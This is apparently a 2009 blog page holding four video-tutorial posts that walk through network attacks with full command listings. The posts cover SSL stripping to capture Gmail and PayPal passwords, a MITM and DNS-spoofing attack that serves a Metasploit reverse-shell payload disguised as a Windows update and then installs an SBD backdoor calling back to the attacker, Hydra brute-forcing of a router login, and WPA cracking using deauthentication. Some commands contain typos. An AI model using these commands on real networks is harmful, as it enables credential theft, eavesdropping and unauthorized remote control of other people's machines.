2009-07-10

[Video] Stripping SSL & Sniffing HTTPS (SSLStrip)

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
Download video: http://www.mediafire.com/?nbx8odfabbgf21j



What is this?
This video shows that with SSL encryption, it isn't secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.




How does this work?
> Performing a 'Man In The Middle' attack therefore all the traffic flows through the attacker.
> Picks out HTTP traffic from port 80 and then packet redirection / forwarding onto a different port.
> SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.
> ettercap then picks out the username & password.


What do I need?
> sslstrip
> arpspoof
> ettercap
*all in BackTrack 4 Pre Final*


Network Setup:
Targets IP: 192.168.1.6
Gateway : 192.168.1.1


Software
Name: sslstrip
Version: 0.2
Home Page: http://www.thoughtcrime.org/software/sslstrip/index.html
Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.2.tar.gz

Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

Name: ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net
Download Link: http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download


Commands:
kate /etc/etter.conf
>*uncomment redir_command_off in the iptables, linux section*
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i wlan0




Notes:
You could save the packets instead, and then look through it later, in case ettercap doesn't pick up the information you need!

Song: 16 Bit Lolitas - Nobody Seems To Care
Video length: 03:55
Capture length: 4:41

Blog Post: http://g0tmi1k.blogspot.com/2009/07/videotutorial-how-to-snifff-ssl-https.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1659-%5Bvideo%5D-how-snifff-ssl-https-sslstrip.html



~g0tmi1k
Posted by g0tmi1k at 17:44 52 comments Links to this post
Labels: ,

2009-07-04

[Video] Man In The Middle (ettercap, metasploit, SBD)

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2319124
Download video: http://www.mediafire.com/?338fbcekne9pd0b



What is this?
By setting up a fake web site, we social engineer our target to run our exploit. The end result gives us command line access to our target's PC.



How does this work?
> Ettercap to do the MITM Attack
> Metasploit for the exploit
> Secure BackDoor (SBD) for the backdoor
> Apache for the web server


What do I need?
> Ettercap
> Metasploit
> A web server
> SBD (optional)
*all of this is on backtrack 4*


Network Setup:
Attackers IP: 192.168.1.104
Targets IP: 192.168.1.101
Gateway IP: 192.168.1.1


Software
Name: Ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net/
Download Link: http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download

Name: Metasploit
Version: 3.3
Home Page: http://www.metasploit.com/
Download Link: http://spool.metasploit.com/releases/framework-3.2.tar.gz

Name: SBD
Version: 1.36
Home Page: http://tigerteam.se/
Download Link: http://packetstormsecurity.org/UNIX/netcat/sbd-1.36.tar.gz
Source: http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=sbd


Commands:
/pentest/exploits/framework3/msfpayload/meterpreter/reverse_tcp LHOST=192.168.1.104 X > /var/www/Windows-KB183905-x86-ENU.exe
kate /var/www/index.html
>*Relace filename with new one, Windows-KB183905-x86-ENU.exe*
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcper
SET LHOAT 192.168.1.104
exploit

cd /usr/share/ettercap/mv -f etter.dns etter.dns.old
kate etter.dns
> * A 192.168.1.104
ettercap -i wlan0 -T -q -P dns_spoof -M ARP /http://192.168.1.1/ /http://192.168.1.101/

upload /root/tools/backdoors/sbd-1.36/sbd.exe C:/
execute -H -f "C:/sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 192.168.1.104"

wine /root/tools/backdoors/sbd-1.36/sbd.exe -l -k g0tmi1k -p 7332


Notes:
Sorry for the poor video editing on this one - it is cut from a final video called "g0tmi1k's home network" which is still incomplete.

Song: Mr. Scruff - Is He Ready & Mr. Scruff - Get a Move On
Video length: 06:57
Capture length: 7:40

Blog Post: http://g0tmi1k.blogspot.com/2009/07/videotutorial-man-in-middle-mitm-attack.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1658-[video]-attack-man-middle-{mitm}-ettercap-metasploit-sbd.html



~g0tmi1k
Posted by g0tmi1k at 12:39 23 comments Links to this post
Labels: ,

[Video] Cracking HTTP passwords (Hydra)

HLinks
Watch video on-line: http://g0tmi1k.blip.tv/file/2318952
Download video: http://www.mediafire.com/?yhc1adzytiqibjc


What is this?
A basic guide on how to use hydra to crack a http password on a 'home' router.




How does this work?
> Uses a dictionary attack to test for weak or simple passwords on one or more remote clients


What do I need?
> Hydra
> Big dictionary


Software
Name: Hydra
Version: 5.4
Home Page: http://freeworld.thc.org/
Download Link: http://freeworld.thc.org/download.php?t=r&f=hydra-5.4-src.tar.gz


Commands:
hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get /

-l = username
-P = password (Looks for a wordlist)
-e ns = checks for 'null' password
-t xx= How many tasks to run at once
-f = exit once it finds the first user/password
-s = connect via SSL
-vV = verbose mode (shows more info)
192.168.1.1 = IP address
http-get = what to crack/method etc
/ = Page to crack - root


Notes:
This is cut from my final video called "g0tmi1k's home network".
The password HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!

Song: Rage Against The Machine - Killing in the Name of (Mr. Oizo Remix)
Video length: 01:21
Capture length: 01:40

Blog Post: http://g0tmi1k.blogspot.com/2009/07/video-tutorial-how-to-crack-http-hydra.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1657-%5Bvideo%5D-how-crack-http-passwords-hydra.html
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html



~g0tmi1k
Posted by g0tmi1k at 11:50 3 comments Links to this post
Labels:

[Video] Cracking WiFi - WPA/WPA2 with Hidden SSID (aircrack-ng + airolib-ng)

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2318855
Download video: http://www.mediafire.com/?kn0b37v79rptd9e



What is this?
How to crack a wireless network using WPA/WPA2 (PSK/AES) encryption with a connected client (as both have same method!) . Then using a pre-computed hash table which has been "pre-salted" with the ESSID for the network to get the pass-phrase.




How does this work?
> Captures a 4-way handshake
> Creates a quick DoS (Denial of Service) attack at connected client to force them to disconnect and reconnect
> Apply a brute force dictionary attack to the handshake


What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power


Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz


Commands:
airmon-ng start wlan0



airodump-ng mon0

airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0



aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0



airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst

kate ~/essid

airolib-ng crackwpa --import essid ~/essid

airolib-ng crackwpa --stats

airolib-ng crackwpa --clean all

airolib-ng crackwpa --batch

airolib-ng crackwpa --verify all



aircrack-ng -r crackwpa output*.cap


Notes:
This is cut from my final video called "g0tmi1k's home network".
There HAS to be a CONNECT client.
The pass-phrase HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!

Song: Sub Focus - Rock It
Video length: 03:53
Capture length: 04:03

Blog Post: http://g0tmi1k.blogspot.com/2009/07/video-tutorial-how-to-crack-wpawpa2.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1656-%5Bvideo%5D-how-crack-wpa-wpa2-aircrack-ng-airolib-ng.html
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html



~g0tmi1k
Posted by g0tmi1k at 10:27 71 comments Links to this post
Labels: ,
Subscribe to: Posts (Atom)